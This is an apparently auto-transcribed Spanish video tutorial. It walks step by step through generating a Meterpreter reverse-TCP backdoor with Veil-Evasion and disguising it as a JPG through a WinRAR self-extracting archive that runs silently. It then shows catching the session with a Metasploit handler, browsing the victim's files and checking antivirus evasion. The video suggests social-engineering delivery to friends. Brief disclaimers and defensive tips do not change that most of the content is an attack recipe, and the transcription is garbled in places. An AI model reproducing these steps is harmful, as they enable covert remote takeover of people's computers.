Hola amigos, el día de hoy les voy a enseñar paso a paso cómo vamos a crear nuestro Backdoor con la herramienta Velevation y luego voy a enseñar cómo vamos a introducir o vamos a meter ese Backdoor en una imagen con extensión JPG utilizando la herramienta para comprimir y descomprimir archivos WinRAR Antes de ir a la parte práctica, quiero mencionar lo siguiente Las demostraciones, prácticas y conceptos impartidos en este video tutorial no buscan promover el uso de programas para la instrucción de sistemas informáticos Solo se hace con fines educativos, por lo que cualquier uso de los programas aquí mencionados no es responsabilidad de mi persona si desea probar los métodos de ataques vistos en el video tutorial Úselo en máquinas virtuales y servidores para prueba Si lo hace en sistemas y redes ajenas o públicos, hágalo bajo su responsabilidad Así que amigos, damos inicio entonces a la parte práctica de cómo crear nuestro Backdoor en nuestro sistema operativo Kali Linux Recordando, yo estoy realizando un laboratorio virtualizado Y como aplicación para virtualizar, yo utilizo BingWare Ustedes pueden instalar su sistema operativo Kali Linux en la aplicación BingWare, pero como saben es una aplicación que es licenciada Ustedes pueden realizar la descarga de esta aplicación Obtenerla por un mes, pero luego necesitarían comprar una licencia Yo en lo particular y en lo personal, a mí me ha funcionado muy bien Y ya llevo un muy buen tiempo trabajando con VirtualBox Así que, listo Aquí como vemos, está mi máquina virtual Ya corriendo con Kali Linux Voy a proceder a abrir una consola Como este es un segundo video Porque en el primer video enseñé Cómo instalar Velevation Entonces ya debemos saber La ruta donde tenemos la carpeta de la aplicación Velevation Vamos a entrar a la carpeta GitHub Si recuerdan en el video anterior Si le están dando el seguimiento De tanto del video de instalación Entonces, ahí guardamos un archivo Donde está todo el log del proceso de instalación de la aplicación Velevation Ya que como dato muy importante Estamos realizando instalación de O realizamos, mejor dicho La instalación de Velevation 3.0 Sobre Kali Linux 2.19.2 Esa es la versión de Kali Linux Que nosotros tenemos en este momento Es decir, es la última versión de Kali Linux a la fecha Ahora vamos a acceder a la carpeta Vele Y para ejecutar todos aquellos scripts que tienen permisos de ejecución Vamos a dar O vamos a escribir, mejor dicho En nuestra consola Punto pleca o punto slash El nombre del script a ejecutar Y damos Enter Listo Aquí estamos ya en En la consola Ejecutando la aplicación Develevation Para ello Vamos a seleccionar La herramienta Evasion Ya que como vemos Contiene dos herramientas Vamos a seleccionar Uno Use uno Listo Y como vemos Tenemos Cuarenta y un Payloads Aquí básicamente Lo que queremos ahora Es visualizar el listado De Payloads Con los que contamos Para seleccionar El Payload Que vamos a requerir En nuestro Backdoor Entonces Vamos a listar Y nosotros vamos a utilizar El Backdoor Que está con el número Eh, perdón Si, vamos a utilizar Perdón Eh, el número Vamos a utilizar El Payload Número 28 Que es Python Meterpreter Reverse TCP .py Entonces Para ello Vamos a dar El número 28 Use 28 Y listo Aquí básicamente Eh, vamos a proceder A configurar Eh, el Payloads Los datos Que necesitamos Configurar En este Payloads Son Lhost Lport Y le vamos a decir Que vamos a utilizar Encriptamiento Entonces Para realizar La configuración Vamos a utilizar El comando Set Lhost Voy a abrir Otra terminal Para validar Cuál es Mi dirección IP 192.168.88.192 Ese es el localhost 192.168.88.192 Damos Damos Enter Ahora vamos a setear El puerto local Que vamos a utilizar Set Lport Vamos a dar El puerto 556 Aquí le vamos a dar Set Vamos a dar Vamos a dar Payloads Y le vamos a dar Yes Enter Ahora Vamos a visualizar Que nuestro Payloads Ya esté seteado Con los valores Que acabamos De configurar Para ello Vamos a dar El comando Option Listo Como ven Aquí tenemos Lhost 192.168.88.192 Puerto 556 Y aquí En la parte De use Payloads Está como Yes Si nos vamos A la imagen Que teníamos Anteriormente Donde está Los valores Por defecto En la parte De use Payloads Tenemos N De no Así que Básicamente Aquí Ya lo único Que nos queda Es generar Nuestro Backdoor ¿Cómo lo vamos A hacer? Sencillo Solo vamos A dar El comando Generate Damos Enter Aquí nos Va a pedir Que Introduzcamos Un nombre Para nuestro Nuestro Backdoor Yo le voy a dar Payloads Payloads Evasion Vamos a dar Enter Y aquí Le vamos Le vamos A dar Con que opción Ejecutable Queremos crear Nuestro Payloads En nuestro Caso Le vamos A dar El número Uno Vamos a utilizar El valor Por defecto Y damos Enter Para que comience A generar Nuestro Payloads Y vamos A comenzar A visualizar La salida Donde se comience A crear Nuestro Backdoor Listo Amigos Ya nuestro Backdoor Está creado Aquí Un dato Importante Es que Ese Backdoor Fue creado En la carpeta Plecavar Precalib Dale Opus Compiled Velevation .exe Vamos a sacar De esta carpeta Nuestro Ejecutable Y lo vamos A meter En El desktop Del usuario Root Entonces Vamos a proceder A traer Al desktop Ese archivo Nos vamos A venir Aquí A Other Location Computer Vamos a buscar Bar Live Vamos a buscar Bail Output Compiled Y aquí Y aquí Aquí está Nuestro archivo Que generamos Con la Herramienta Velevation Básicamente Lo voy a cortar Y lo voy a Traer Al escritorio Aquí damos Enter Y ya podemos Salir de la Herramienta De elevation Damos exit Y estamos Fuera A ver Ahora Yo voy a Levantar Una máquina Virtual Con Microsoft Windows Yo voy a Necesitar Copiar Este archivo A mi computador Con Microsoft Windows ¿Cuál es El método Que yo voy a Utilizar Para Jalar Desde Windows Este archivo Bueno Yo voy a Utilizar Un Cliente Que va a Ser Una conexión Mediante El protocolo SSH Entonces Para ello Vamos a Inicializar El servidor De SSH Y este Lo vamos Inicializar Dando el Siguiente Comando Pleca Etc Init.d SSH Start ¿Cómo podemos Visualizar Que ya Está Corriendo Aparte De tener Ya El ok De Inicialización Del servicio En nuestro Kali Linux Bueno Podemos Auditarnos Con El escáner Que ya Venimos Conociendo Llamado Nmap Damos Nmap Localhost Y como Ven En efecto Ya tenemos El servicio De SSH Arriba Es más Yo aquí Puedo Abrir Mi cliente Putty Y hacer Una conexión Remota A mi Servidor A mi servidor De Kali Linux 192 168 192 Doy Enter Aquí mi servidor De SSH Está generando La llave La llave La llave Pública Que va Utilizar Tanto El servidor SSH Como el cliente Que en este caso Es Putty Damos Yes Como esta es una Instalación Que recién hago De mi máquina Virtual Kali Linux Si yo Trato de Loggearme Con el usuario Root Por defecto SSH No me permite Por cuestiones De seguridad Como ven Me dice Access Deny De manera Temporal Ya que no es Recomendable Pero si estamos En un entorno Seguro Y es Una auditoría Que estamos Realizando A un cliente Y nos vemos En la necesidad De Loggearnos V SSH A nuestro Kali Linux Debemos habilitarlo Entonces Como Como permitimos A root En el servidor SSH Para permitir Conexiones Remotas Bueno Vamos a editar Un archivo De configuración Del servidor SSH Para ello Yo voy a utilizar El editor De texto Nano Y el pad Es pleca Etc Init.d Perdón Init.d SSH El archivo Se llama Perdón En init Están todos Los Todos los Archivos De los servicios Para inicializarlos Entonces La configuración De SSH Está en pleca Etc SSH Y el archivo Se llama SSH Dead Config A ver Si yo quisiera Cambiar El puerto Por defecto Que trae SSH Entonces Yo descomentaría Esta línea Y aquí Por ejemplo Podría poner Un Nuevo puerto Podría ser Por ejemplo Que yo quisiera Utilizar En vez de 22 Conectarme Al puerto 2205 Pero para ello Necesitaría Descomentar En esta Esa línea Solo se los muestro Por ejemplo Adicionalmente Aquí Esta Tercer línea Dice Listen En adres Si por ejemplo Mikali Linux Tuviese Dos tarjetas De red Por defecto Yo podría Conectarme A la dirección IP De cada Tarjeta De red Mediante El protocolo SSH Pero si por Temas de Seguridad Yo quisiera Incrementar Un poco La seguridad Y solo quisiera Tener una Sola tarjeta De red Escuchando Conexiones SSH Entonces Básicamente Solo Descomentaríamos Esta línea Y aquí Estaríamos Poniendo La única Dirección IP Que estaría En modo Escucha Para conexiones SSH Listo Entonces En esta Línea Yo la Podría Descomentar Y ponerle Permit Root Login Yes Pero sin embargo La voy a dejar Para referencia Y voy a escribir Una línea Nueva Y le voy a dar Permit Root Login Yes Ya con esto Solo me queda Salvar Los cambios Y reiniciar El Reinicializar El servicio Para salir De mi editor De texto Nano Básicamente Yo voy a dar Control X Yes Yes Enter Y listo Ahora voy a reinicializar El servicio De SSH Etc Init.d SSH Restart Listo Aquí Ya tomo los cambios Nuestro servidor SSH Ahora Voy a volver A abrir esta ventana De Putty Como bien Como ven Perdón Ella Terminó el tiempo De la sesión Así que aquí En el menú De En esta barra Del menú De Putty Voy a dar Duplicar Sesión Voy a cerrar Esa sesión Que ya Finalizó Me voy a Loggear Con root La contraseña Que tengo Para mi usuario Root Y listo Señores Como ven Ya tenemos Acceso remoto Con el usuario Root A nuestro Kali Linux Bien Que más Nos queda hacer Bueno Por ahora Voy a Levantar Voy a abrir La consola De De lo que es Mi Virtual Box Y aquí Básicamente Voy a Inicializar La computadora Con Microsoft Windows Ese Ese Backdoor Lo vamos a Meter Como he venido Diciendo En una Imagen Con extensión .jpg En mi Microsoft Windows Yo tengo Una imagen Que descargue De internet Por ejemplo De Jennifer López Lógicamente Un atacante Va a buscar Realizar Ingeniería Social Para Atacar A su Víctima Entonces Entonces Lógicamente Si Yo tengo Un conocido Un amigo Y quiero Ganar Acceso Remoto A su Computador Para mí Puede ser Bastante Sencillo Que yo le envíe Ya sea Por medio De un Correo Electrónico O por medio De De una USB Que esa Persona Me preste Una USB Y yo Le deje Copiada Esa Imagen En En Esa Unidad De USB O por Ejemplo Que se lo Envíe Ya sea Por Whatsapp O por El chat De Facebook Anyway Aquí lo Importante Es Hacer Ese Proceso De Que le Llamamos Ingeniería Social De Ver Como Le entregamos Ese Archivo A una Víctima Y Una Vez Esa Persona Le De A la Imagen Y La Abra Ahí Se Estaría Realizando El Proceso De Ejecución De Nuestro Backdoor Y A partir De Ahí Nosotros Ya Tendríamos Acceso A ese Computador Entonces Como Ven Yo Aquí Ya Tengo La Imagen Importante Para que Ustedes No Sean Víctima De Estos Ataques Es Recomendable Señores Que Ustedes Tengan Un Antivirus Siempre Actualizado Si Es Una Empresa Se Le Recomienda Que El Administrador De La Red Del Área De Sistema De La Compañía Tenga Configurado Los Computadores Para que De manera Periódica Y si Es Posible A Diario Cree Un Schedule Para que De manera Automática A una Hora Determinada Los Antivirus Se Estén Actualizando Se Les Recomienda Que Tengan Licenciamiento Válido Que Sea Comprado A las Compañías De Antivirus Ya Que Si Ustedes Descargan Antivirus Pirateados Prácticamente Pueden Estar Siendo Víctimas De Un Ataque Utilizando Un Programa Que Ya Está Modificado Esto Es Uno De Los Tips Que Les Puedo Dar Segundo Por Defecto Microsoft Windows Viene Para Que No Muestre Las Extensiones De Los Archivos En Este Momento Si Miramos El Archivo Que Dice Jennifer López Punto JPG Pero Esto Pasa Y En Este Momento Estamos Viendo La Extensión Porque Yo Descomente La Opción Que Por Defecto Viene Comentada De Que Oculte Las Extensiones Y Para Ellos Se Los Voy A Mostrar A Ver Nos Vamos A Venir Aquí Al Explorador De Archivos Nos Vamos A Venir Aquí A La Parte De Opciones De Folder Vamos A Venir Aquí A La Parte De View Y Aquí En La Parte De View Por De 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 Aquí Viene Comentado Así Lo Trae Microsoft Entonces Si Yo Le Doy Apply Aquí No Estamos Observando Que Extensión Es Este Archivo Cuando Nosotros Modifiquemos Ese Archivo Va A Variar La Extensión Entonces Como Va A Llevar Jennifer López .jpg .exe Y A Milla Me Estaría Dando La Pauta Que Hay Algo Raro Con Ese Archivo Y Yo No Lo Abriría Pero Si Nosotros En Microsoft Windows No Estamos Viendo O No Estamos Visualizando Las Extensiones Van A Caer Señores Entonces Es Recomendable Que Ustedes Estén Viendo O Conozcan Que Extensión Traen Los Archivos Que Les Envían Que Ustedes Descargan O Están Abriendo En Su Computador Entonces Recuerden Nuevamente Si Abren El Explorador De Archivos Se Vienen A La Parte De Opciones De Folder En La Parte De View Ustedes Quitan El Check Donde Dice Esconda Las Extensiones Damos Apply Y Como Ven Aquí Ya Me Muestra Que Extensión Es Este Archivo Bueno Aquí Básicamente Vamos A Necesitar De Una Herramienta Para Hacer Extensión Punto Ico Esta Imagen Yo Ya Descargue Una Herramienta Les digo Cual Es Y Ustedes Perfectamente La Pueden Descargar En Internet Es Gratis Me Voy A Download Y Esa Herramienta Se Llama Toy Con Yo Me Voy A La Carpeta Toy Con Voy A Ejecutar Toy Con Punto Exe Y Aquí Básicamente Lo Que Voy A Hacer Es Jalar Solo Deme Un Segundo Listo Y Aquí Le Vamos A Decir Que Queremos Ver Los Iconos En Tamaño Grande Bueno Básicamente Para Convertir Este Archivo En Extensión Icon Yo Solo Voy A Arrastrar Y Voy A Meter A La Cajita De Toy Con La Imagen Listo Ahí Lo Está Convirtiendo Y Aquí Ya Tengo Mi Archivo Jennifer López Punto Icon Ahora Vamos A Necesitar Traer Hacia Nuestro Microsoft Windows Para Preparar Nuestro Backdoor Dentro Para Preparar O Meter Dentro De La Imagen De Jennifer López Nuestro Backdoor Vamos A Necesitar Jalarlo Desde Kali Linux Yo Utilizó Esta Herramienta Que Se Lama Win SSP Básicamente Yo Aquí Voy A Definir La Dirección IP De Mi Kali Linux 192 El Puerto Por Defecto 22 Y La Contraseña Que Utilizo En Suario Roots Nos Loggeamos Igual Como Cuando Hice La Primera Conexión Con Mi Cliente Putty Aquí Él Está Generando La Llave Como Ven Es Shadow 56 Aquí Está El MD5 El Algoritmo Que Está Utilizando Esta Es La Llave Que Utilizar Entre El Servidor DSH Con La Add Y Se Realiza La Conexión Básicamente Yo Aquí Me Voy A Ir Como Ven Estoy Dentro Del Usuario Root Entonces Aquí Me Voy A Ir Al Desktop Aquí Voy A Traer Me Voy A Posicionar En El Desktop Del Microsoft Windows Y Básicamente Voy A Mover Hacia El Lado Izquierdo El Archivo Que Quiero Pasar Doy OK Y Listo Amigos Y Aquí Ya Puedo Cerrar Esta Sesión De SFTP Esa Sesión Que Abrí A Micali Linux Fue Una Sesión Segura Ya No Es Un FTP Con Que Como Sabemos Ese Es Un Protocolo Fácil De Vulneral Porque Si Alguien Pone Un Capturador De Tráfico Es decir Pone Un Sniffer Cuando Yo mande El Usuario De Root Y La Contraseña Perfectamente El Hacker Que Tiene El Sniffer En Medio De La Conexión Entre Servidor Y Cliente Y Va A Conocer Cual Era Mi Contraseña En Este Momento Ya No Porque Lo Hizo La Conexión Del FTP Mediante SSH Que es una Conexión Totalmente Encriptada Así que Listo Vamos a Cerrar Acá Y Aquí Ya Tenemos Nuestro Nuestro Archivo VELEVATION Ahora Básicamente Aquí Lo Que Vamos A Hacer Es Voy A Dar Un Clic Con El Botón Derecho En El Archivo Que Creamos Con VELEVATION O En El Backdoor Y Aquí Le Vamos A Decir Añadir El Archivo Listo Aquí Básicamente Vamos A Definir Un Nombre Yo Le Voy A Poner Le Vamos A Cambiar El Nombre De VELEVATION Punto RAR Aquí Le Voy A Seleccionar La Mejor Y Aquí Al Lado Derecho Le Vamos A Decir Crear Un Archivo Auto Extraíble Listo Estamos Bien Ahora Nos Vamos A La Viñeta De Avanzado Nos Vamos A Auto Extraíble Y Vamos A Configurar Lo Siguiente Nos Vamos Aquí Actualizar Extraer Y Actualizar Ficheros Sobre Escribir Todos Los Ficheros Ahora Nos Vamos A Instalación Y Aquí Le Vamos A Decir Que Ejecute El Archivo Que Se Llama VELE Evasion Punto Exe Ahora Ahora Nos Vamos A Texto Icono Seleccionamos Jennifer López Punto Ico Vamos Vamos Revisar Entonces Vamos A Ver Tenemos En Actualizar Extraer Y Actualizar Ficheros Sobre Escribir Todos Los Ficheros Luego Nos Vamos A Instalación Aquí En Instalación Vamos A Decir De Que Ejecute VELE Evasion Punto Exe Que Es Este Archivo Que Estoy Mostrando Con El Mouse Y También Le Vamos A Decir Que Abra La Imagen Que Se Llama Jennifer López Punto JPG Ahora Aquí Modus Le Vamos A Dar Ocultar Todo Aquí En La Parte De Texto O Icono Aquí Le Vamos A Dar Examinar Y Vamos A Cargar El Icono Que Generamos Listo Así Que Ya Con Esto Solo Nos Queda Dar Ok Y Ok Y Ahí Se Estaría Generando O Estaríamos Escondiendo El Backdoor En La Imagen JPG Recuerden Aquí Definimos Un Nombre Jennifer López Punto JPG Que Es El Nombre Que Tiene Esta Imagen Luego Método De Compresión Definimos La Mejor Cuando Damos Click En Crear Un Archivo Auto Extraíble En Esta Imagen Le Va A Poner .exe Por Eso Que Le Están Viendo Que Ya Cambió Que Al Inicio Pues No Se Miraba Porque Pasamos A La Viñeta De Avanzado Ahora Revisemos Nuevamente Avanzado Nos Vamos A Auto Extraíble Nos Vamos Actualizar En Actualizar Recuerden Extraer Y Actualizar Ficheros Aquí En Modo De Sobre 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 Todos Los Ficheros Aquí En La Parte De Instalación Le Vamos A Decir Que Ejecute Tras La Extracción Be Elevation .exe Jennifer López .jpg Texto Del Icono Vamos A Seleccionar El Icono Que Creamos Y Aquí En La Parte De Modos Le Vamos A Decir Ocultar Todo Ya Con Esto Estaría Completado El Proceso Damos OK Y Listo Amigos Como Ven Esta Es La Imagen Que Estaríamos Enviando Mediante Ingeniería Social Recordándoles Y Tips Importante Muchos Por defecto Dejan Que Oculte Las Extensiones De .jpg .exe A Mi Se Me Debería De Hacer Raro Y No Debería De Ejecutarlo Así Que Nuevamente Recordándoles Recomendándoles Habiliten Que Ustedes Puedan Ver Las Extensiones De Los Archivos En Su Sistema Operativo Ahora El Siguiente Paso Es Abrir Nuestra Consola De Meta Exploit En Nuestro Kali Linux Voy A Minimizar Mi Window Aquí Básicamente Voy A Abrir La Consola De Linux Vamos A Abrir Una Consola La Cual Ya Teníamos Abierta Miren Amigos Antes De Ejecutar La Consola De Del Framework De Meta Exploit Quiero Mencionarles Lo Siguiente Por Ejemplo Si Este Proceso De Hacking Que Estamos Realizando Es En Una Auditoría Que Estamos Haciendo A Un Cliente O A Una Compañía Lo Recomendable Es Automatizar Los Procesos Ya Que Nos Podemos Ahorrar Mucho Tiempo De De Estar Seteando Por Ejemplo Aplicaciones Aquí Voy a Aprovechar Para Mostrarles Como Automatizar Por Ejemplo El Proceso De Los Parámetros Que Debe Llevar Nuestro Framework De Metasploit Una Vez Que Lo Ejecutemos A Ver Me Voy a Conectar Remotamente Y Aquí Ya Está Abierta La Sesión Vamos A Entrar A Desktop Y Aquí Voy a Crear Un Archivo Este Archivo Voy a Utilizar El Editor De Texto Nano Y Este Archivo Lo Voy a Llamar Bale .rc Muy Importante Con Todos Aquos Archivos Con Erc Son Los Archivos Que Podemos Ejecutar Desde El Framework De Metasploit Entonces Aquí Lo Siguiente Es Definir El Seteo Que Debe Llevar Nuestro Payload Entonces Use Exploit Multihandler Set Payload Windows Meterpreter Reverse Set Local Host Y Vamos A Definir La dirección IP Que Tiene Nuestro Kali Linux Que Es la 192 Si Recuerdan El Porto Que Definimos Cuando Creamos El Backdoor Fue 556 Y Aquí Que Se Ejecuta El Exploit Ya Con Esto Salvo Control X Yes Y Enter Otro Dato Importante Es Que Cuando Yo Voy A Ejecutar Metasploit Yo Necesito Tener Corriendo La Base De Datos De Postgreed Que Por Defecto No Viene Para Que Levante De Manera Automática El Servicio Entonces Para Ello Antes De Ejecutar La Consola De Metasploit Vamos A Inicializar El Servicio De La Base De Datos Como Lo Hacemos Pleca etc In In Perdón In Punto D Postgreed Start Esperamos Que Inicialice La Base De Datos Listo Y Hasta OK Auditemos Solo Para Validar Que Ahora Tenemos Dos Puertos Abiertos En Nuestro Cali Linux Local Host Y Listo SSH Y La Base De Datos Yo Ahora En Esta Consola Básicamente Le voy A Dar MS F Console Menos R Aquí Necesito Posicionarme En el Desktop Entonces Pleca Root Y Es el Desktop Del Usuario Root Listo Entonces MSF Console Menos R Y Ahí Esta El Archivo Que Queremos Que Ejecute Así El Procederá Ya De Manera Automática Jalar Los Datos Que Ingrese En El Archivo Y Configurarme El Payload Damos Enter Y Vamos A Esperar Que Levante Nuestra Consola T Gracias. Un dato importante, por ejemplo, esta información, la estás hablando de la base de datos, dice que contamos con 1905 exploits, 1073 auxiliares, 329 POS, 545 payloads, 44 encoder, 2 evasion y 10 knobs. Listo, aquí. Por lo que miro, tuvimos un error. Dice que desconoce el comando set. Entonces, para corregirlo, porque igual esto es pura práctica, es importante ver los errores y entender cómo poder solucionarlos. Entonces, yo quiero que me ejecute mi consola de MetaSploit desde el archivo que creé. Entonces, ¿dónde para mí? ¿Dónde está el problema? Bueno, básicamente aquí me está diciendo que el comando set lx556 no lo reconoció y eso pasó, señores, porque lo escribí en mayúscula y es en minúscula. Si yo quiero ver la configuración del payload actualmente, solo voy a escribir show, enter. Info, perdón, aquí me dice que sería info. A lo que pasa que ya trato de ejecutar el exploit. Entonces, nuevamente me voy a salir de la consola, voy a dar exit. Voy a abrir el archivo. RC. Y como ven, en efecto quedó en mayúscula. Entonces, voy a cambiar el comando set por minúsculas. Entonces, básicamente aquí solo es salvar este cambio. Listo. Y nuevamente ejecuto mi consola con el archivo elevation.rc. Listo. Entonces, en este momento el exploit ya está corriendo. Ya básicamente mi conexión o mi servidor está en modo escucha a la dirección 192.168.88.192, el puerto 556. Bueno, entonces, ¿qué me queda o qué me resta hacer? Básicamente es irme a mi Microsoft Windows. Y ejecutar el archivo que creamos. Voy a tratar de ver si logramos ver cuando ya tengamos acceso a la consola. Vamos a dar doble clic sobre la imagen. Como ven, para el usuario, básicamente no pasó nada. Aquí tiene abierta su imagen. Sin embargo, si visualizo mi Cali Linux, aquí me dice que ya se envió una conexión desde la dirección IP 192.168.88.193. Y dice que ya hay una sesión abierta. Es más, aquí nuevamente les voy a mostrar. Y miremos qué dirección IP tiene esta máquina. En efecto, tiene la 193. Entonces, ahora en este momento, básicamente, damos sesión. Y como ven, amigos, aquí ya me muestra que tengo una sesión entablada mediante Meterpreter a la computadora que se llama Lab03, su dirección IP y el puerto. Entonces, ya en este momento, ya tenemos control total hacia ese computador, donde lo podemos apagar, podemos encender la cámara, podemos ver los directorios de ese computador. Vamos a ejecutar un LS. Aquí, por ejemplo, cuando ejecutamos un help, puedo ver todos los comandos que puedo utilizar en Meterpreter, en la consola de Meterpreter. Por ejemplo, aquí está la parte del comando Score. Aquí podríamos, vamos a dar el comando Versión. La versión del framework de la consola. A ver, como vemos, si doy un LS, me dice que me está listando, c dos puntos, user, mi usuario y el desktop. Si, por ejemplo, quisiera salir del desktop del Microsoft Windows, damos un LS y, como vemos, ya me va a mostrar todos los archivos del usuario. Vamos a ver, de J.Morgan. Si me quiero salir hasta C, nuevamente, dos puntos, doy un LS y aquí estaría teniendo o visualizando todos los archivos de la carpeta C. A ver, vamos a mostrar algo. Yo aquí en el desktop voy a crear un fichero. Lo voy a crear con el comando Tosh. Le voy a poner estás-hackeado.txt. Txt. Enter. Si quisiera editar ese archivo, pues utilizo el editor de texto. Y, por ejemplo, yo aquí perfectamente podría dar el comando. Put, le vamos a dar help para buscar el comando a utilizar. Por ejemplo, si quisiera, este comando es bastante importante. Si quisiera ver los hatches, le vamos a dar. Hatch. Tump. Vamos a probar con GetSystem. No me está dejando correr los comandos. Como ven, aquí hay comandos para incluso poner a grabar el micrófono, para activar la webcam. Pero, sin embargo, yo aquí lo que quiero hacer en este momento, por ejemplo, si hago un ifconfig. Aquí obtengo la dirección IP de ese computador de Microsoft Windows. Me muestra la dirección IP de la lookback. Me muestra toda la información, MAC address, modelo de tarjeta. Aquí dice que tiene la 193. Nuevamente haré un help. Pero, como ven, ya aquí ya tengo hackeado el computador de la víctima. Que es un sistema con Microsoft Windows. Aquí, por ejemplo, puedo hacer un download. Pero yo quiero subir el archivo al computador con Microsoft Windows. Aquí debería de ejecutar. Y el archivo se llama Estás hackeado. Estás hackeado.txt Ahora, básicamente, me quedaría irme al Microsoft Windows. Aquí voy a minimizar la imagen. Y ese archivo, si se recuerdan, yo me posicioné en la carpeta C. Entonces, voy a abrir. Voy a ir a la carpeta C. Vamos a dar un dir. Dice que estoy en C. Realmente, regreso a Microsoft Windows. Básicamente, aquí necesito buscar el archivo que subí. Vamos a ver aquí. Vamos a entrar a User. Jmurga Desktop. Entonces se dé jmurga ls, se dé desktop ls y ahí tenemos el backdoor, el archivo .ico, el jpg. Y como ven amigos, aquí ya está subido el archivo, está hackeado, incluso si minimizo ya le subí el archivo. Repito, para conocer toda la cantidad de comandos que nos permite la consola de meterpreter, ejecutar un help y ahí ustedes van probando qué comandos les permite también. Si es un usuario que tiene full permisos de administrador, lógicamente van a tener control de todo. Uno de los grandes fallos es que muchas personas de las áreas de sistemas instalan Microsoft Windows o instalan sistemas operativos y dejan un solo usuario el cual le dan permisos de administrador. Y esto es un grave error señores. Así que con esto básicamente estaría concluyendo el video. Si sin embargo quiero mostrarles un tips adicionales. Voy a minimizar la consola aquí de mi Kali Linux y voy a abrir aquí el browser de Google Chrome. Aquí vamos a buscar un sitio que se llama No Dice. Este enlace se lo voy a dejar en la parte de abajo de este video. Básicamente en este sitio, amigos, ustedes pueden seleccionar el archivo que ustedes tengan duda de que no es un archivo confiable. Por ejemplo, yo voy a seleccionar aquí en Desktop y voy a subir el archivo llamado JenniferLopez.jpg.exe. Le vamos a dar Open y le vamos a decir ScanFile está subiendo a la plataforma de esta empresa el archivo. Esperamos un momento. Voy a dar Refrescar. Aquí dice que está subiendo nuevamente. Al parecer ese sitio está caído. Sin embargo, aquí está anti-scan.me. De igual manera lo vamos a probar. Vamos a subir el archivo. Vamos a ScanFile. Esperamos el resultado. Esperamos el resultado. Y listo. Aquí tenemos el resultado o el reporte de este archivo Un dato importante, como ven, solo fue detectado por el antivirus Carpesky, Zonalar, EZNOT32 y Clan AVG De ahí para todos estos antivirus como Avira, el AVG, el AVAS Y todos los demás que me muestra este reporte No detectaron ese archivo como un posible backdoor malware o virus Entonces esto es un tema bien pero bien delicado Porque como les comenté necesitan tener un buen antivirus Y necesitan tener una licencia que le hayan comprado al proveedor de antivirus No descarguen, instalen en las computadoras antivirus Que estén con llaves craqueadas Como muy buena referencia Aquí pueden determinar Que antivirus les puede servir Para ustedes tomar a la hora de la hora Decisión de comprar antivirus Ya sea para su casa Y usar en sus computadores personales O en su compañía Así que amigos Este sitio se los voy a dejar en la parte de abajo del video No se olviden Lo que les mencioné anteriormente Habiliten para visualizar las extensiones de los archivos Y con esto básicamente yo estaría concluyendo Este video tutorial Donde se enseña paso a paso Cómo crear un backdoor Con VELEVATION Cómo incrustar, insertar o meter Ese backdoor en una imagen con extensión .jpg Utilizando el compresor y descompresor de archivos WinRAR Eso mismo también es posible hacerlo Por ejemplo en archivos de Microsoft Office Como Word, Excel, PowerPoint O incluso se pueden utilizar herramientas Para ocultar sobre archivos PDF Así que amigos Yo con esto me despido Suscríbanse a mi canal Para seguir creando contenido Recomienden mi canal Dudas, comentarios O consultas Hacérmelas saber Ya sea en mi blog O en mi canal de YouTube Muchas gracias a todos